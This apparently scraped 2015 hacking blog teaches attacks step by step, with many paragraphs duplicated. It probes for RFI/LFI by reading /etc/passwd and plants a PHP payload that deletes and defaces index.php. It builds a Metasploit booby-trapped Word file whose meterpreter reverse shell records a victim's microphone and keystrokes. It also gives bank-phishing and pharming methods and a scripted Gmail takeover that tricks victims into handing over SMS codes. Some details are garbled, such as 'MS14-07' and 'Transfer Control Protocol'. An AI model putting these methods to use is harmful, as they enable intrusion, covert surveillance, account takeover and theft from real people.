This is a type of vulnerability that allows a user to include remote or local files, having it parsed and then executed on the server.
To see if a certain website is vulnerable to this issue, try visiting “index.php?
p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited with RFI or LFI. If a different thing appears, then the site is not vulnerable to RFI - this does not necessarily mean it is safe from LFI, however. To verify, go for “index.php? p=/etc/passwd”. This is assuming the server is running on a *nix-based system. If you can view the password file, then the server can be hacked by LFI. If something else appears, then RFI and LFI both won’t work.
If the target is found to be vulnerable to RFI, you can upload a PHP code to their server PHP. Let’s say you create the following under the file hack.php:
<?php
Unlink(“ïndex.php”);
System(“echo GOTCHA > index.php””);
?>
Once you view “index.php?=http://<DOMAIN NAME>.com/hack.php””, then the code will be run on the server. When this is done, the site will change to the simple GOTCHA
message and none will be the wiser.
Sunday, November 22, 2015
Friday, November 20, 2015
XSS (Cross-Site Scripting)
If you have been hanging around the Internet as much as you should have (to be a hacker, at least), you would have at least heard of this term. This allows the attacker’s input to be sent to unwary victims.
The primary use is cookie stealing - and no, not the type your sadistic older sibling does. Once the attacker steals yours, they can log into the site the cookie is stolen from using your identity and under the right conditions.
This vulnerability can be determined using the site’s search facility. Try feeding it with some HTML, such as “<font color=green>XSS</font>”. If the word XSS comes up, then the site is vulnerable. Else, you need to find a different way in.
The primary use is cookie stealing - and no, not the type your sadistic older sibling does. Once the attacker steals yours, they can log into the site the cookie is stolen from using your identity and under the right conditions.
This vulnerability can be determined using the site’s search facility. Try feeding it with some HTML, such as “<font color=green>XSS</font>”. If the word XSS comes up, then the site is vulnerable. Else, you need to find a different way in.
Thursday, November 19, 2015
HACKING A COMPUTER
STEP 1: Like the tampered APK in the Android exploit we did, you will have to find a way to compromise the target system. The common way of doing this is sending an email with a document or a link. Within it is a listener (rootkit) that will allow the hacker to gain access to the computer.
STEP 2: When the document is downloaded and the rootkit, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work such as “MS14-07” that allows the execution of remote codes from Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After loading, find out more about the exploit by typing “info”. Then, “show options”.
STEP 3: This exploit will work only in Office 2010. It can be easy to use, though, as all you need to fill in is the filename. Set it by “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. Like earlier, set the LHOST (your system’s IP) so the
payload will know to call your device back. Then, type “exploit”. This will create the tampered Word file.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set
the LHOST to be your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part - on the meterpreter prompt, try running “run sound_recorder - l /root”. This will turn on the mark’s microphone and send all recorded conversations in a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data - yes, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.
STEP 2: When the document is downloaded and the rootkit, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work such as “MS14-07” that allows the execution of remote codes from Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After loading, find out more about the exploit by typing “info”. Then, “show options”.
STEP 3: This exploit will work only in Office 2010. It can be easy to use, though, as all you need to fill in is the filename. Set it by “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. Like earlier, set the LHOST (your system’s IP) so the
payload will know to call your device back. Then, type “exploit”. This will create the tampered Word file.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set
the LHOST to be your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part - on the meterpreter prompt, try running “run sound_recorder - l /root”. This will turn on the mark’s microphone and send all recorded conversations in a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data - yes, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.
Wednesday, November 18, 2015
ICMP
This stands for Internet Control Message Protocol, the most used in networking. This is a connectionless protocol, meaning it will not use any port number. It is usually meant for diagnostic purposes, server querying, or error reporting. As a hacker, knowledge about this is important because you will be using ICMP a lot to end payloads. Pinging, for example, uses ICMP - and this, just like any ICMP message, has inherent security holes.
In ICMP, for example, an error message is not sent in response to an error. When the error is sent, it will send the IP header and datagram, which details the error’s cause. This will cause the receiver to associate the error with the specific process. This means that when the Type 0 (echo reply) has been sent, the reply will not be a Type 8 (echo request), though a Type 8 will always elicit a Type 0.
This is taken advantage of by the “Smurf Attack”, which is nowhere near as cute as it sounds. In this technique, the attacker will spoof the ICMP packet’s source address, sending a broadcast to all computers in the network. If this traffic is not filtered, then the victim’s network will be congested, dropping its productivity. Aside from using this to Smurf the network, it can also be used to gather information by discovering all hosts on the network.
In ICMP, for example, an error message is not sent in response to an error. When the error is sent, it will send the IP header and datagram, which details the error’s cause. This will cause the receiver to associate the error with the specific process. This means that when the Type 0 (echo reply) has been sent, the reply will not be a Type 8 (echo request), though a Type 8 will always elicit a Type 0.
This is taken advantage of by the “Smurf Attack”, which is nowhere near as cute as it sounds. In this technique, the attacker will spoof the ICMP packet’s source address, sending a broadcast to all computers in the network. If this traffic is not filtered, then the victim’s network will be congested, dropping its productivity. Aside from using this to Smurf the network, it can also be used to gather information by discovering all hosts on the network.
TCP
This stands for Transfer Control Protocol, a fixed communication protocol that is a bit more complicated and more reliable than UDP. It works with IP (Internet Protocol) in doing its job - TCP takes care of the internal communication between the application and network software, while IP takes care of communication from another computer.
Since TCP and UDP are very much alike even in terms of hacking potential, check out the next item for a great hack idea.
Since TCP and UDP are very much alike even in terms of hacking potential, check out the next item for a great hack idea.
Tuesday, November 17, 2015
Online Banking Hacking
After you learned about different types of hacking, there is a last one to take in consideration and that type of hacking is called Internet Banking Hacking and it’s considered a cyber crime in the most countries of the world.
In the last years, internet banking has become a feature used by a big number of people and it has its advantages, but the main disadvantage is that once hackers get into this type of hacking all the money are lost. Authorities and expert analyses estimate that in the future years the cases of online banking hacking will take a considerable growth. Online banking exists since 1980 and new methods to hack
online bank accounts are appearing everyday.
The first method you can choose for hacking an online bank account is phishing, the number of this kind of attacks are growing in the last years against banking systems, to hack the victim you should use social engineering techniques as well.
Hackers hide under a bank identity and make their new identity look as real as possible pretending to belong to the bank, malicious emails, advertisements and emails are the top secret in getting into someone’s bank account without their permission or knowledge. You should adopt the typical phishing scheme and try to collect as much information as you can about your victim, before anything else you should know their email address and if the victim uses this address for online banking but don’t worry, most of the people do it because it’s a little bit too complicated to work on
couple emails at a time and people who choose internet banking are usually busy and they don’t have time to follow more than an email address.
So, after you have got the email address, send any email that can get your victim’s attention by opening that email, the content of the email can be something interesting or in this case it’s better to guide your victim though a link to a specialized website that will ask for financial data and security details, those kind of websites are specially designed to look like an official bank account, but is
definitely not the original one, those infected websites are designed identical to the original ones.
Your email should make the victim click on a link which will guide your victim to a website which perfectly replicates a bank site.
Hackers also include in the email attachments which contain the link to the fake website and once opened it has the same effect. Phishing emails should take the official form of notifications and emails of the banks, organizations or e-payment systems, those kinds of messages request your victim’s sensitive information that will help you reach your goal. Malware specially designed for online banking hacking exist! it’s named Prg Banking Trojan.
McAfee has published a report on phishing which indicates that hackers aren’t hacking small banks, their targets are big companies, banks and organization that could worth the hack operation to be done. 37% of all banks on the globe were hacked using the phishing method in the last 12 moths at least once.
Hackers attempt to every sector by phishing it. Hackers are interested in predominantly banking, e-payment systems, e-auctions and generally in hacking big financial organizations around the globe.
Phishers are focused on breaking into hosting providers and they succeed in most of the cases, hackers disgracing servers and update their own configuration in order to display phishing pages from a private subdirectory of each domain that the machine host.
Don’t forget to protect yourself even if you are trying to hack online accounts, with a little lack of attention you can loose everything as well as your victims. Don’t divulge your Internet Protocol, read carefully every email and don’t click unless you are sure, ask and request more information always in order to keep protected.
The second method used by hackers to break into online banking accounts is called Watering Hole and specialists define it as an evolution of phishing attacks. By choosing this option hackers are injecting malicious codes onto a public website visited by a small and standard group of people.
In Watering Hole attack, hackers wait for target people to visit the hacked website and they are not inviting their victims to do it, they are only waiting for them to visit the website. If you choose this method, you should use Internet Explorer and Adobe Flash Player.
Hackers are compromising websites using this method that aren’t updated and configured very frequent because they are easily to hack than an updated website, usually hackers are using the exploit kits they find on the black square. Pro hackers hack the website at least six months before they attack it. This method is very efficient because hackers and websites can be located very
hard comparatively to phishing attacks. After the attacks hackers keep in touch with the website to make sure that everything is going in the direction they want to.
In 2012-2014, hackers used this method to hack a regional bank in Massachusetts. The operation was successful due to the JavaScript elements on both sites, the bank in Massachusetts and the local government that was under Washington DC suburbs:
Hxxp://www.xxxxxxxxtrust.com
Hxxp://xxxxxxcountrymd.gov
Another attack using this method was discovered in March 2013 when many banks in South Korea were compromised, the hackers collected sensitive data from the bank and they have also shut down their system. An interruption of their services was made on their online banking. Hackers consider this method a solution for the problems that authorities and security services and systems give them, and because they love to solve problems, they found an innovative solution in this case as well.
Researches show that most of the hackers make money online using this method and a lot of them are still undetected.
Hackers have a lot of ideas and they are really good, their ideas reflect in their solutions and that’s how Pharming and Credit Card Redirection hack method was born.
This method consists in hijacking a bank’s URL and when the customers access it they are automatically guided to another site which is identical to the original website. This method of hacking is a little bit more difficult than the other two methods, but not impossible. You can technically make it with one of the next techniques:
1. DNS Cache Poisoning
DNS’s exist in a bank’s, organization’s or company’s network to make a better response performance. Hackers attack the DNS server by exploring vulnerabilities in the DNS software, which make the server to give an error because it will incorrectly validate the DNS response. The server will redirect people to another site because it will catch wrong all the entries. Usually, the server which will host the victims is managed and controlled by hackers in order to give the customers malware. Hackers can even attack customers if they provide the hackers their IP.
2. Hosts File Modification
Hosts file is used by hackers to direct the customers on any website under their control.
A new technique is Credit card redirection which is used on disgraceful ecommerce websites to let the hackers get the sensitive information they need. This technique is not hacking the customer directly, after the victim pays using the card, the hacker modify the flow of the operation and all the money are redirected to them and most of the attacks are made on websites that offer e-commerce
services.
Hackers also break into a victim’s account by changing the credit card processing file.
Another type of attacks used in online banking hacking is called Malware based attacks and they are classified as the most dangerous attacks on the internet related to online banking services.
There are many malicious categories but in general they are designed to hit the online financial business. Security community considers Zeus, Carberp and Spyeye are considered the most dangerous of all. Zeus is in fact a Trojan horse which best works on all the versions of Windows, it was first discovered in 2007 when hackers use it to obtain illegally information about US Department of Transportation, it’s the oldest one from those three and even NASA got hacked in 2009 using Zeus.
MIITB is maybe the most efficient method used by hackers in internet banking where the ones who want to attack combine social engineering with malware which is infecting the browser of the victim. It mostly hide under the form of BHO (Browser Helper Object), attacks are based on proxies which infect the browser of the customer exploring it’s weakness on the victim’s device. Malicious codes are able to change the content of an online transaction between the bank and the customer.
The Zeus Trojan is also used to hack and get bank credentials by MIIT keystroke logging. Specialists consider that nine million phishing emails with Zeus were sent in 2009. According to ZeusTracker USA, Deutschland, Russia, UK, Ukraine, Romania, Netherlands, France, Japan and Turkey are top ten countries which are hosting Zeus. HoT- Hand on Thief is another Trojan specially designed to hack online banking, it was created to hit the Linux and Mac systems which demonstrated to be
immune to malware. Authorities say that it was created in Russia and it’s available to buy on some Russian underground forums, it’s capable of infecting the victims and stealing sensitive information from their machines. Grabbers and backdoor infection vectors are currently on sale with Hand of Thief for approximately $3000.
DDoS attacks are also used to hack internet banking. In case of online banking hacking, hackers are helped by volunteers that participate in the operation, a botnet is easier to detect and volunteers can block the whole process of detecting.
After 129 countries have been attacked with DDoS attacks, FBI decides to share a list of more than 130.000 Internet Protocol addresses used in attacks, attacks where the victims could not access their online or mobile banking services.
The fundamental types of DDoS attacks:
The ones based on volume VBA- the hacker is making an inundation with big quantity of data on the site. Protocol Attacks PA- when the hackers are trying to imbue the target servers by exploiting network protocol failures. Layer Seven Attacks- created to exhaust the resource limits when hackers make inundations with huge amounts of HTTP requests that saturate a target’s resources. DDoS attacks are also used as a deflection to hide the results of an attack that is ongoing. Dirt Jumper is a part of DDoS malware group and it has an updated version called Pandora, a big number of DDoS kits have shown up like YZF, ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting the distribution of Dirt Jumper kit being used in bank attacks.
Using the methods from above, hackers can get money and they are also called criminal cyber if they do this activity illegally, they can hack an ultimate number of account and banks until they are discovered, if they are ever discovered. Now more than ever, hackers don’t focus only on computers, they also take in consideration hacking the mobile phones which are today such an result of great
ideas combined with hard work, since the phones are smart phones they allow you to do any kind of operation you want or need and they are way more used nowadays than computers, a lot of people use their smart phone to pay bills online or to do transactions online via internet banking services all around the world and that’s why hackers are focusing also on smart phones and hacking their systems in order to reach a new goal or just to give themselves new challenges. A research done in 2015 highlights the importance of smart phones and shows us that smart phones are more used nowadays then computers.
In the last years, internet banking has become a feature used by a big number of people and it has its advantages, but the main disadvantage is that once hackers get into this type of hacking all the money are lost. Authorities and expert analyses estimate that in the future years the cases of online banking hacking will take a considerable growth. Online banking exists since 1980 and new methods to hack
online bank accounts are appearing everyday.
The first method you can choose for hacking an online bank account is phishing, the number of this kind of attacks are growing in the last years against banking systems, to hack the victim you should use social engineering techniques as well.
Hackers hide under a bank identity and make their new identity look as real as possible pretending to belong to the bank, malicious emails, advertisements and emails are the top secret in getting into someone’s bank account without their permission or knowledge. You should adopt the typical phishing scheme and try to collect as much information as you can about your victim, before anything else you should know their email address and if the victim uses this address for online banking but don’t worry, most of the people do it because it’s a little bit too complicated to work on
couple emails at a time and people who choose internet banking are usually busy and they don’t have time to follow more than an email address.
So, after you have got the email address, send any email that can get your victim’s attention by opening that email, the content of the email can be something interesting or in this case it’s better to guide your victim though a link to a specialized website that will ask for financial data and security details, those kind of websites are specially designed to look like an official bank account, but is
definitely not the original one, those infected websites are designed identical to the original ones.
Your email should make the victim click on a link which will guide your victim to a website which perfectly replicates a bank site.
Hackers also include in the email attachments which contain the link to the fake website and once opened it has the same effect. Phishing emails should take the official form of notifications and emails of the banks, organizations or e-payment systems, those kinds of messages request your victim’s sensitive information that will help you reach your goal. Malware specially designed for online banking hacking exist! it’s named Prg Banking Trojan.
McAfee has published a report on phishing which indicates that hackers aren’t hacking small banks, their targets are big companies, banks and organization that could worth the hack operation to be done. 37% of all banks on the globe were hacked using the phishing method in the last 12 moths at least once.
Hackers attempt to every sector by phishing it. Hackers are interested in predominantly banking, e-payment systems, e-auctions and generally in hacking big financial organizations around the globe.
Phishers are focused on breaking into hosting providers and they succeed in most of the cases, hackers disgracing servers and update their own configuration in order to display phishing pages from a private subdirectory of each domain that the machine host.
Don’t forget to protect yourself even if you are trying to hack online accounts, with a little lack of attention you can loose everything as well as your victims. Don’t divulge your Internet Protocol, read carefully every email and don’t click unless you are sure, ask and request more information always in order to keep protected.
The second method used by hackers to break into online banking accounts is called Watering Hole and specialists define it as an evolution of phishing attacks. By choosing this option hackers are injecting malicious codes onto a public website visited by a small and standard group of people.
In Watering Hole attack, hackers wait for target people to visit the hacked website and they are not inviting their victims to do it, they are only waiting for them to visit the website. If you choose this method, you should use Internet Explorer and Adobe Flash Player.
Hackers are compromising websites using this method that aren’t updated and configured very frequent because they are easily to hack than an updated website, usually hackers are using the exploit kits they find on the black square. Pro hackers hack the website at least six months before they attack it. This method is very efficient because hackers and websites can be located very
hard comparatively to phishing attacks. After the attacks hackers keep in touch with the website to make sure that everything is going in the direction they want to.
In 2012-2014, hackers used this method to hack a regional bank in Massachusetts. The operation was successful due to the JavaScript elements on both sites, the bank in Massachusetts and the local government that was under Washington DC suburbs:
Hxxp://www.xxxxxxxxtrust.com
Hxxp://xxxxxxcountrymd.gov
Another attack using this method was discovered in March 2013 when many banks in South Korea were compromised, the hackers collected sensitive data from the bank and they have also shut down their system. An interruption of their services was made on their online banking. Hackers consider this method a solution for the problems that authorities and security services and systems give them, and because they love to solve problems, they found an innovative solution in this case as well.
Researches show that most of the hackers make money online using this method and a lot of them are still undetected.
Hackers have a lot of ideas and they are really good, their ideas reflect in their solutions and that’s how Pharming and Credit Card Redirection hack method was born.
This method consists in hijacking a bank’s URL and when the customers access it they are automatically guided to another site which is identical to the original website. This method of hacking is a little bit more difficult than the other two methods, but not impossible. You can technically make it with one of the next techniques:
1. DNS Cache Poisoning
DNS’s exist in a bank’s, organization’s or company’s network to make a better response performance. Hackers attack the DNS server by exploring vulnerabilities in the DNS software, which make the server to give an error because it will incorrectly validate the DNS response. The server will redirect people to another site because it will catch wrong all the entries. Usually, the server which will host the victims is managed and controlled by hackers in order to give the customers malware. Hackers can even attack customers if they provide the hackers their IP.
2. Hosts File Modification
Hosts file is used by hackers to direct the customers on any website under their control.
A new technique is Credit card redirection which is used on disgraceful ecommerce websites to let the hackers get the sensitive information they need. This technique is not hacking the customer directly, after the victim pays using the card, the hacker modify the flow of the operation and all the money are redirected to them and most of the attacks are made on websites that offer e-commerce
services.
Hackers also break into a victim’s account by changing the credit card processing file.
Another type of attacks used in online banking hacking is called Malware based attacks and they are classified as the most dangerous attacks on the internet related to online banking services.
There are many malicious categories but in general they are designed to hit the online financial business. Security community considers Zeus, Carberp and Spyeye are considered the most dangerous of all. Zeus is in fact a Trojan horse which best works on all the versions of Windows, it was first discovered in 2007 when hackers use it to obtain illegally information about US Department of Transportation, it’s the oldest one from those three and even NASA got hacked in 2009 using Zeus.
MIITB is maybe the most efficient method used by hackers in internet banking where the ones who want to attack combine social engineering with malware which is infecting the browser of the victim. It mostly hide under the form of BHO (Browser Helper Object), attacks are based on proxies which infect the browser of the customer exploring it’s weakness on the victim’s device. Malicious codes are able to change the content of an online transaction between the bank and the customer.
The Zeus Trojan is also used to hack and get bank credentials by MIIT keystroke logging. Specialists consider that nine million phishing emails with Zeus were sent in 2009. According to ZeusTracker USA, Deutschland, Russia, UK, Ukraine, Romania, Netherlands, France, Japan and Turkey are top ten countries which are hosting Zeus. HoT- Hand on Thief is another Trojan specially designed to hack online banking, it was created to hit the Linux and Mac systems which demonstrated to be
immune to malware. Authorities say that it was created in Russia and it’s available to buy on some Russian underground forums, it’s capable of infecting the victims and stealing sensitive information from their machines. Grabbers and backdoor infection vectors are currently on sale with Hand of Thief for approximately $3000.
DDoS attacks are also used to hack internet banking. In case of online banking hacking, hackers are helped by volunteers that participate in the operation, a botnet is easier to detect and volunteers can block the whole process of detecting.
After 129 countries have been attacked with DDoS attacks, FBI decides to share a list of more than 130.000 Internet Protocol addresses used in attacks, attacks where the victims could not access their online or mobile banking services.
The fundamental types of DDoS attacks:
The ones based on volume VBA- the hacker is making an inundation with big quantity of data on the site. Protocol Attacks PA- when the hackers are trying to imbue the target servers by exploiting network protocol failures. Layer Seven Attacks- created to exhaust the resource limits when hackers make inundations with huge amounts of HTTP requests that saturate a target’s resources. DDoS attacks are also used as a deflection to hide the results of an attack that is ongoing. Dirt Jumper is a part of DDoS malware group and it has an updated version called Pandora, a big number of DDoS kits have shown up like YZF, ArmageddoN and DiWar. FBI and FS-ISAC and IC3 are highlighting the distribution of Dirt Jumper kit being used in bank attacks.
Using the methods from above, hackers can get money and they are also called criminal cyber if they do this activity illegally, they can hack an ultimate number of account and banks until they are discovered, if they are ever discovered. Now more than ever, hackers don’t focus only on computers, they also take in consideration hacking the mobile phones which are today such an result of great
ideas combined with hard work, since the phones are smart phones they allow you to do any kind of operation you want or need and they are way more used nowadays than computers, a lot of people use their smart phone to pay bills online or to do transactions online via internet banking services all around the world and that’s why hackers are focusing also on smart phones and hacking their systems in order to reach a new goal or just to give themselves new challenges. A research done in 2015 highlights the importance of smart phones and shows us that smart phones are more used nowadays then computers.
Email Hacking for Beginners and not
The fourth type of hacking is email hacking and in this type hackers attempt to an email address without permission. The electronic mail is more used than the traditional mail boxes and that’s due to the evolution, emails are used today mostly as a form of communication due to its options. There are two types of services web-based: an email service which is open-based and that means this type
deliver email accounts to any customer, some of them are for free but some request fees and the other type give email accounts controlled and organized by companies for employees, and in general students and members only. There are three big forms of attacks: spam, virus or phishing.
The first type of attack is realized by delivering huge email broadcasts which contains a hidden IP address or email addresses, a spam message usually contains something very attractive such as low-priced travel tickets, job offers and in general any kind of offers and to be more attractive spammers use a lot of colors and photos. Some of the hack victims may open the magic message, read it and get
really interested in its content.
The big fun for hackers is when they hit a big company and hold their sending email and IP address. If the masters of email hacking choose a company and hack it the company would be destroyed and their internet connection would be down and stopped by its Internet Service Provider (ISP) and none of their emails would reach the destinations.
Another method used by hackers to get unauthorized access into someone’s email is by sending them an email that hides a virus in the background, the Sobig virus is often used because it’s a modern technology that creates a spamming infrastructure because it’s taking over unwilling PC members. The third way hackers follow to hack and email is called phishing and it consist of collecting
sensible and valuable information from others emails such as credit card numbers, user names and passwords and many hackers use this method to get money. The risk of being hacked by phishing is very high in those days especially on Facebook and Twitter where you give some precious information about your person, social media is not as kind as it seems and there are a lot of well hidden secrets behind them.
There are three types of phishing, the first type is known as Spear Phishing and it’s used to attack target people, companies and organizations, 91% of email attacks are made with this kind of phishing and most of them are successful. The next phishing type is called Clone Phishing and its adepts clone emails by creating identical ones and the last type of phishing is known as Whaling, people use this
term to describe a high profile attack made using phishing method.
An interesting way to hack someone’s account you can apply only by knowing his/her phone number, let me explain how, when a person is making a new email address its recommended to attach their phone number for security reasons and in case you forget your email password you can set a new one if you add your phone number, so most of the people add their phone numbers. It’s enough to know your victim’s phone number and email address to start.
First, go to the login page and type the email where they ask you to do it and after that select the ‘’need help?’’ option and select “Get a verification code on my phone: [mobile phone number]” and the sms will be sent to the phone number, the sms usually is formed from six letters. After that, you should send a message to the person’s number pretending you are Google and the message should be
“Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.” the victim Will believe this message and send you the verification code which you will enter lately. After entering the code set up a new password and we are done, check everything you want on that account.
*Note: this method works only with Gmail accounts and it will be successful if the victim doesn’t know your number, in case the number is known by the victim try to send the message from an unknown number.
Every one of us must take measures immediately to protect our email addresses, a big company like Yahoo!, Gmail or Hotmail treat their customers with curiosity by offering them high security, each one of them will notify you immediately if there is something strange and ask you to check your email or set up your password. Another good idea is to make a complicated email address with numbers but make sure you don’t forget it! Also you should choose a complex password with numbers and big and small letters (I recommend creating a password with more than 12 characters). Your computer should be protected as well, make sure you get a professional, original and high quality antivirus software like Avira or Avast, they might offer you a short testing period and after that they will ask you to buy it, do it, it totally worth! Even a hacker should protect his computer because you never know what could happen in the next second.
Choosing a difficult security question will increase your security rate but be careful; you should remember the answer even after ten years or more if it’s needed, this option could save your email’s life because no one will be able to surf the internet in hope to find something very personal about you. However, email hackers have a lot of success those days by simply getting into more and more email accounts...
deliver email accounts to any customer, some of them are for free but some request fees and the other type give email accounts controlled and organized by companies for employees, and in general students and members only. There are three big forms of attacks: spam, virus or phishing.
The first type of attack is realized by delivering huge email broadcasts which contains a hidden IP address or email addresses, a spam message usually contains something very attractive such as low-priced travel tickets, job offers and in general any kind of offers and to be more attractive spammers use a lot of colors and photos. Some of the hack victims may open the magic message, read it and get
really interested in its content.
The big fun for hackers is when they hit a big company and hold their sending email and IP address. If the masters of email hacking choose a company and hack it the company would be destroyed and their internet connection would be down and stopped by its Internet Service Provider (ISP) and none of their emails would reach the destinations.
Another method used by hackers to get unauthorized access into someone’s email is by sending them an email that hides a virus in the background, the Sobig virus is often used because it’s a modern technology that creates a spamming infrastructure because it’s taking over unwilling PC members. The third way hackers follow to hack and email is called phishing and it consist of collecting
sensible and valuable information from others emails such as credit card numbers, user names and passwords and many hackers use this method to get money. The risk of being hacked by phishing is very high in those days especially on Facebook and Twitter where you give some precious information about your person, social media is not as kind as it seems and there are a lot of well hidden secrets behind them.
There are three types of phishing, the first type is known as Spear Phishing and it’s used to attack target people, companies and organizations, 91% of email attacks are made with this kind of phishing and most of them are successful. The next phishing type is called Clone Phishing and its adepts clone emails by creating identical ones and the last type of phishing is known as Whaling, people use this
term to describe a high profile attack made using phishing method.
An interesting way to hack someone’s account you can apply only by knowing his/her phone number, let me explain how, when a person is making a new email address its recommended to attach their phone number for security reasons and in case you forget your email password you can set a new one if you add your phone number, so most of the people add their phone numbers. It’s enough to know your victim’s phone number and email address to start.
First, go to the login page and type the email where they ask you to do it and after that select the ‘’need help?’’ option and select “Get a verification code on my phone: [mobile phone number]” and the sms will be sent to the phone number, the sms usually is formed from six letters. After that, you should send a message to the person’s number pretending you are Google and the message should be
“Google has detected unusual activity on your account. Please respond with the code sent to your mobile device to stop unauthorized activity.” the victim Will believe this message and send you the verification code which you will enter lately. After entering the code set up a new password and we are done, check everything you want on that account.
*Note: this method works only with Gmail accounts and it will be successful if the victim doesn’t know your number, in case the number is known by the victim try to send the message from an unknown number.
Every one of us must take measures immediately to protect our email addresses, a big company like Yahoo!, Gmail or Hotmail treat their customers with curiosity by offering them high security, each one of them will notify you immediately if there is something strange and ask you to check your email or set up your password. Another good idea is to make a complicated email address with numbers but make sure you don’t forget it! Also you should choose a complex password with numbers and big and small letters (I recommend creating a password with more than 12 characters). Your computer should be protected as well, make sure you get a professional, original and high quality antivirus software like Avira or Avast, they might offer you a short testing period and after that they will ask you to buy it, do it, it totally worth! Even a hacker should protect his computer because you never know what could happen in the next second.
Choosing a difficult security question will increase your security rate but be careful; you should remember the answer even after ten years or more if it’s needed, this option could save your email’s life because no one will be able to surf the internet in hope to find something very personal about you. However, email hackers have a lot of success those days by simply getting into more and more email accounts...
Subscribe to:
Comments (Atom)